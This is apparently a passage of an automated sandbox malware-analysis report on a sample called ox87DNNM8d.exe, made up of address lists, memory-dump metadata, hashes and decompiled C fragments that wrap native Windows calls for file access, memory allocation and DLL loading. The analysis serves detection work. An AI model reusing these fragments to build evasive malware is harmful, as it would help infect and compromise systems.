0x00b58c90
0x00b58c91
0x00b58c95
0x00b58c97
0x00b58c98
0x00b58c99
0x00b58c9b
0x00b58c9d
0x00b58c9e
0x00b58ca0
0x00b58ca0
0x00b58ca1
0x00b58ca2
0x00b58ca4
0x00b58ca9
0x00b58cab
0x00b58cac
0x00b58caf
0x00b58cb1
0x00b58cb4
0x00b58cb7
0x00b58cb8
0x00b58c54
0x00b58c54
0x00b58c56
0x00b58c59
0x00b58c5b
0x00b58c5d
0x00b58c5e
0x00b58c60
0x00b58c60
0x00000000
0x00b58c5e
0x00b58c52
0x00b58cb9
0x00b58cba
0x00b58cbc
0x00b58cbe
0x00b58cbf
0x00b58cc1
0x00b58cc1
0x00b58cc3
0x00b58cc4
0x00b58cc6
0x00b58cca
0x00b58ccc
0x00b58cd2
0x00b58cd3
0x00b58cd5
0x00b58cd5
0x00b58cd6
0x00b58cd7
0x00b58cda
0x00b58cdc
0x00b58cde
0x00b58cdf
0x00b58ce1
0x00b58ce1
0x00b58ce2
0x00b58ce3
0x00b58ce4
0x00b58ce5
0x00b58ce6
0x00b58ce8
0x00b58cea
0x00b58ceb
0x00b58ced
0x00b58ced
0x00b58cee
0x00b58cef
0x00b58cf1
0x00b58cf3
0x00b58cf5
0x00b58cf6
0x00b58cf8
0x00b58cfa
0x00b58cfd
0x00b58cff
0x00b58d01
0x00b58d02
0x00b58d04
0x00b58d04
0x00b58d06
0x00b58d08
0x00b58d0e
0x00b58d10
0x00b58d13
0x00b58d15
0x00b58d18
0x00b58d1b
0x00b58d1c
0x00b58d1d
0x00b58d1e
0x00b58d22
0x00b58d24
0x00b58d2a
0x00b58d2b
0x00b58d2d
0x00b58d2d
0x00b58d2e
0x00b58d2f
0x00b58d2f
0x00b58d31
0x00b58d34
0x00b58d36
0x00b58d37
0x00b58d39
0x00b58d39
0x00b58d3a
0x00b58d3b
0x00b58d3d
0x00b58d43
0x00b58d45
0x00b58d46
0x00b58d47
0x00b58d49
0x00b58d4b
0x00b58d4c
0x00b58d4e
0x00b58d4e
0x00b58d50
0x00b58d51
0x00b58d52
0x00b58d53
0x00b58d55
0x00b58d57
0x00b58d58
0x00b58d5a
0x00b58d5a
0x00b58d5b
0x00b58d5c
0x00b58d5d
0x00b58d5e
0x00b58d5f
0x00b58d68
0x00b58d6a
0x00b58d6a
0x00b58d6d
0x00b58dca
0x00b58dca
0x00b58dcb
0x00b58dcd
0x00b58dcd
0x00b58dce
0x00b58dcf
0x00b58dd0
0x00b58dd1
0x00b58dd3
0x00b58dd5
0x00b58dd8
0x00b58dda
0x00b58ddd
0x00b58de0
0x00b58de1
0x00b58de2
0x00b58de4
0x00b58de6
0x00b58de8
0x00b58de9
0x00b58deb
0x00b58ded
0x00b58dee
0x00b58df1
0x00b58df3
0x00b58df5
0x00b58df8
0x00b58d6f
0x00b58d6f
0x00b58d71
0x00b58d73
0x00b58d74
0x00b58d78
0x00b58d79
0x00b58d7c
0x00b58d7e
0x00b58d80
0x00b58d83
0x00b58d85
0x00b58d89
0x00b58d8b
0x00b58d8e
0x00b58d90
0x00b58d92
0x00b58d93
0x00b58d95
0x00b58d97
0x00b58d98
0x00b58d9a
0x00b58d9a
0x00b58d9b
0x00b58d9c
0x00b58d9d
0x00b58d9e
0x00b58da0
0x00b58da2
0x00b58da5
0x00b58da7
0x00b58daa
0x00b58dac
0x00b58dad
0x00b58dae
0x00b58daf
0x00b58db1
0x00b58db3
0x00b58db6
0x00b58db8
0x00b58dbb
0x00b58dbd
0x00b58dbe
0x00b58dbf
0x00b58dc0
0x00b58dc2
0x00b58dc4
0x00b58dc7
0x00b58dc9
0x00b58dc9
0x00000000
0x00b58dc9
0x00b58d85
0x00b58dfa
0x00b58dfc
0x00b58dfd
0x00b58e03
0x00b58e05
0x00b58e07
0x00b58e09
0x00b58e0b
0x00b58e0c
0x00b58e0f
0x00b58e11
0x00b58e13
0x00b58e16
0x00b58e18
0x00b58e1a
0x00b58e20
0x00b58e22
0x00b58e28
0x00b58e2a
0x00b58e2b
0x00b58e2e
0x00b58e30
0x00b58e31
0x00b58e33
0x00b58e33
0x00b58e34
0x00b58e35
0x00b58e36
0x00b58e39
0x00b58e3b
0x00b58e3c
0x00b58e3f
0x00b58e41
0x00b58e43
0x00b58e47
0x00b58e47
0x00b58e49
0x00b58e4c
0x00b58e50
0x00b58e55
0x00b58e57
0x00b58e59
0x00b58e5b
0x00b58e5d
0x00b58e60
0x00b58e64
0x00b58e69
0x00b58e6b
0x00b58e6d
0x00b58e6f
0x00b58e71
0x00b58e74
0x00b58e78
0x00b58e7a
0x00b58e7d
0x00b58e7f
0x00b58e81
0x00b58e83
0x00b58e85
0x00b58e88
0x00b58e8a
0x00b58e8c
0x00b58e8e
0x00b58e8e
0x00b58e90
0x00b58e91
0x00b58e93
0x00b58e94
0x00b58e94
0x00b58e94
0x00b58e95
0x00b58e97
0x00b58e99
0x00b58e9b
0x00b58e9d
0x00b58e9d
0x00b58e9d
0x00b58e9e
0x00b58e9f
0x00000000
0x00000000
0x00b58ea1
0x00b58ea3
0x00b58ea5
0x00b58ea8
0x00b58eac
0x00b58ead
0x00b58eaf
0x00b58eb0
0x00b58eb1
0x00b58eb2
0x00b58eb3
0x00b58eb5
0x00b58eb7
0x00b58eba
0x00b58ebc
0x00b58ebe
0x00000000
0x00b58ec0
0x00b58ec0
0x00b58ec4
0x00b58ec5
0x00b58ec7
0x00b58ec8
0x00b58ec9
0x00b58eca
0x00b58ecb
0x00b58ecd
0x00b58ecf
0x00b58ed1
0x00b58ed4
0x00b58ed8
0x00b58eda
0x00b58edc
0x00b58edd
0x00b58edf
0x00b58ee5
0x00b58ee7
0x00b58eea
0x00b58eeb
0x00b58eed
0x00b58eef
0x00b58ef1
0x00b58ef4
0x00b58ef8
0x00b58efb
0x00b58efc
0x00b58efd
0x00b58efe
0x00b58f04
0x00b58e8e
0x00b58e90
0x00b58e91
0x00b58e93
0x00000000
0x00b58f06
0x00b58f06
0x00b58f08
0x00b58f0a
0x00000000
0x00000000
0x00000000
0x00000000
0x00b58f0a
0x00b58f04
0x00b58eeb
0x00b58f13
0x00b58f13
0x00b58f14
0x00b58f15
0x00b58f16
0x00b58f18
0x00b58f1a
0x00b58f1c
0x00b58f1d
0x00b58f1f
0x00b58f21
0x00b58f21
0x00b58f22
0x00b58f23
0x00b58f25
0x00b58f27
0x00b58f2a
0x00b58f2c
0x00b58f2e
0x00b58f33
0x00b58f35
0x00b58f36
0x00b58f39
0x00b58f39
0x00b58f3e
0x00b58f40
0x00b58f41
0x00b58f42
0x00b58f44
0x00b58f46
0x00b58f47
0x00b58f49
0x00b58f49
0x00b58f4b
0x00b58f4c
0x00b58f4d
0x00b58f4e
0x00b58f50
0x00b58f52
0x00b58f53
0x00b58f55
0x00b58f55
0x00b58f56
0x00b58f57
0x00b58f58
0x00b58f59
0x00b58f5a
0x00b58f5c
0x00b58f5e
0x00b58f5f
0x00b58f61
0x00b58f61
0x00b58f62
0x00b58f63
0x00b58f6a
0x00b58f6c
0x00b58f6d
0x00b58f6e
0x00b58f70
0x00b58f72
0x00b58f72
0x00b58f74
0x00b58f76
0x00b58f77
0x00b58f77
0x00b58f78
0x00b58f78
0x00b58f0c
0x00b58f10
0x00b58f11
0x00000000
0x00b58f11
0x00b58e8e
0x00b58e47
0x00b5893d
0x00b58907
0x00b588b3
0x00000000
0x00b58871
0x00b587d0

Memory Dump Source

Source File: 00000001.00000002.233109225.0000000000B52000.00000002.00020000.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000001.00000002.233091224.0000000000B50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b50000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb4f8bbcafe8f3e6ec1647408d9d3be4789e3ae56bd3e0b4fc02c83457074d0
Instruction ID: afba0ea93bb9b994b612dd25c24899faa34ec17d71d95bb75daf40be0c51c60b
Opcode Fuzzy Hash: 9bb4f8bbcafe8f3e6ec1647408d9d3be4789e3ae56bd3e0b4fc02c83457074d0
Instruction Fuzzy Hash: 6343696240E7C29FC7038B745DB52E1BFB1AE5721471E49CBC4C18F0A3E6191A9ADB72

Uniqueness

Uniqueness Score: -1.00%

Function 0160C1D0, Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8f07d058c845873e67cd359325749b226581bce50f48dbd801a81a81aac0c80
Instruction ID: 5fdb45c2c53db825d1121fd8c099cdcb3d016decf0831a78292f63313933fa22
Opcode Fuzzy Hash: c8f07d058c845873e67cd359325749b226581bce50f48dbd801a81a81aac0c80
Instruction Fuzzy Hash: 2D528AB15007468FD734CF14EC8A19D3BB1FB41398F906309D9926BAE8D3B465AACF84

Uniqueness

Uniqueness Score: -1.00%

Function 00B54765, Relevance: .4, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233109225.0000000000B52000.00000002.00020000.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000001.00000002.233091224.0000000000B50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b50000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aae2fbea1adf07f8faa4e9d17340a29701c3cba9582ad47d1e0bfc482ef7c91
Instruction ID: 05ce2198f6b7bcb74923a4d81dd2ec516f24aab0ba65a83c1f7d65c293b2fc4e
Opcode Fuzzy Hash: 0aae2fbea1adf07f8faa4e9d17340a29701c3cba9582ad47d1e0bfc482ef7c91
Instruction Fuzzy Hash: 6D028A2104E7C24FC7138B7459766E1BFB1AE53318B1E85CFC4C18F1A3E6251A9AD762

Uniqueness

Uniqueness Score: -1.00%

Function 01609890, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb4b6f882391d71498f6bf5624e08bc0fa70e7a3811fb845d970d6f9d15746ff
Instruction ID: 638feebeabbcb8c71290becbd711c013eec7926252b648df9207245110fbff0e
Opcode Fuzzy Hash: fb4b6f882391d71498f6bf5624e08bc0fa70e7a3811fb845d970d6f9d15746ff
Instruction Fuzzy Hash: 99A18E36E0021ACFCF1ACFB5CC4459EBBB6FF85300B15816AE905BB265EB31A955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 064234C8, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da07b1200e1e14b6c776e60ef368c026434b4479e0e9438de07e759f28d53b1
Instruction ID: 3d6f8e1865e93647edcbafb7ac197be2455d9a8c1dbe2d1305980d38ed7ab3e9
Opcode Fuzzy Hash: 4da07b1200e1e14b6c776e60ef368c026434b4479e0e9438de07e759f28d53b1
Instruction Fuzzy Hash: 3EA11170E1521ADFCB44CFA9C5815AEFBF2FF88200F64946AC415B7214D7389A42CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 06421E28, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8494e92c0e301832c10fd755fe5f601a844e535bdb72f8cf255cc79adbc5bf
Instruction ID: 50a780e28e18d163b867a9b4a963236f2a83c24cf5f43a24ceb639290c094d01
Opcode Fuzzy Hash: 3c8494e92c0e301832c10fd755fe5f601a844e535bdb72f8cf255cc79adbc5bf
Instruction Fuzzy Hash: FB912474E1421ACFDB44CF99C9859AEFBF1FF89310F24945AD515AB220D334AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 06421E18, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d16fea305a40430a599619f730b6076f63c8d5d774fb58d8b378af46197dad8
Instruction ID: 407954dd0ca44621cc29551ffbba079a2aadcd24063b9245d0424fe6acf4d4bd
Opcode Fuzzy Hash: 4d16fea305a40430a599619f730b6076f63c8d5d774fb58d8b378af46197dad8
Instruction Fuzzy Hash: F7812474E1421ACFDB44CFA9C9859AEFBF1FF89300F24945AD515AB220D334AA42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0642CC10, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501b5713840f3538dd7f8a662fe03f5fc10caeeca312d1fddddf9b8e9934fcd4
Instruction ID: 19468becf1a6bd14f6256d0b0365470c0528b1db0325532e535c5d9f99293fca
Opcode Fuzzy Hash: 501b5713840f3538dd7f8a662fe03f5fc10caeeca312d1fddddf9b8e9934fcd4
Instruction Fuzzy Hash: F2513E71E0466ACBDB68CF26CC4479EF7B6AFD9301F20D5AAD50DA7214EB305A858F40

Uniqueness

Uniqueness Score: -1.00%

Function 064234D8, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bc975e67f30ebb0330e0357196066826d0a0471b5127556befb73053bfe58b
Instruction ID: 9711bd25d8a4ac0482f132bbdeb12f0bfd34f74450016c13567bb7f10cc18915
Opcode Fuzzy Hash: 92bc975e67f30ebb0330e0357196066826d0a0471b5127556befb73053bfe58b
Instruction Fuzzy Hash: A941FB74E0521ADFDB48CF95C5815AEFBB2BF88300F64D16AC519B7314D7349A82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 06429600, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58fd0b7dc9c407f8a69a180423adc0b99c478165e0b96a9ffcbb5ce97b3978d6
Instruction ID: 46d4ef1d90f0b141b73fec57d9093d01f7acbbe9245ebd30fd5e2ca8e2c5a9d9
Opcode Fuzzy Hash: 58fd0b7dc9c407f8a69a180423adc0b99c478165e0b96a9ffcbb5ce97b3978d6
Instruction Fuzzy Hash: C3411871E15619CFDB58CF6AD880A9EFBF2FF89210F2480AAD509A7264DB305A41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 064236B8, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b55acc6d490434962b7aa381506ee0169e7c0c187df639aef91bcbebddadb5
Instruction ID: fbb9ae21cd16aab5a28d227845a8e33c950fd708f775afb70f1e3f2fb44a45a5
Opcode Fuzzy Hash: 11b55acc6d490434962b7aa381506ee0169e7c0c187df639aef91bcbebddadb5
Instruction Fuzzy Hash: 3511EC71E006189BEB5CCFABDD4069EFBF7AFC8200F14C07AC908A6228EB3405568F51

Uniqueness

Uniqueness Score: -1.00%

Function 064236A9, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8059853a2cd2085838c425b41f107ba3c8e4a3a01a2c29e69f89734e706a9913
Instruction ID: 0560745b3d604b24788cc81c573031c749cdc09cb8dfaa1ed6af296a05d86759
Opcode Fuzzy Hash: 8059853a2cd2085838c425b41f107ba3c8e4a3a01a2c29e69f89734e706a9913
Instruction Fuzzy Hash: DF11ADB1E006198BEB5CCF6BC94569EFBF3AFC8200F14C17AD918A6254EB3415468F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ox87DNNM8d.exe PID: 5656 Parent PID: 4368 ox87DNNM8d.exeCOMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	661
Total number of Limit Nodes:	74

Executed Functions

Function 00419DFC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: 5db17395fdfcde3866c4cd39893819e8865204a244fa89a264e59f5ab73f4880
Instruction ID: aff7f7320e734d1d101e19b801c814962b30e2e58a93a82651e69c0d70a24c30
Opcode Fuzzy Hash: 5db17395fdfcde3866c4cd39893819e8865204a244fa89a264e59f5ab73f4880
Instruction Fuzzy Hash: 86F0F4B2200108AFCB04DF89CC81EEB77EDAF8C314F028649BE1DA7241D634E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00419D4B(void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t32;
				void* _t39;
				void* _t40;

				_t40 =  <  ?  *((void*)(__esi - 0x74aa9112)) : _t39;
				_t16 = _a4;
				_push(__esi);
				_t4 = _t16 + 0xc40; // 0xc40
				E0041A950(_t32, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t12 =  &_a20; // 0x414b77
				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}

0x00419d4b
0x00419d53
0x00419d59
0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: fe167bbf79f47c29bba4a50b43f339f06435c83d9809aca9a072fade74c9ada0
Instruction ID: e4e7c0c738de3cc9a5603a2b0cd1dd430a0ff74fbf256458b69800a29508ec12
Opcode Fuzzy Hash: fe167bbf79f47c29bba4a50b43f339f06435c83d9809aca9a072fade74c9ada0
Instruction Fuzzy Hash: 3601FDB2201108AFCB18CF88CC85EEB77A9AF8C314F11860CFA1CD3240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
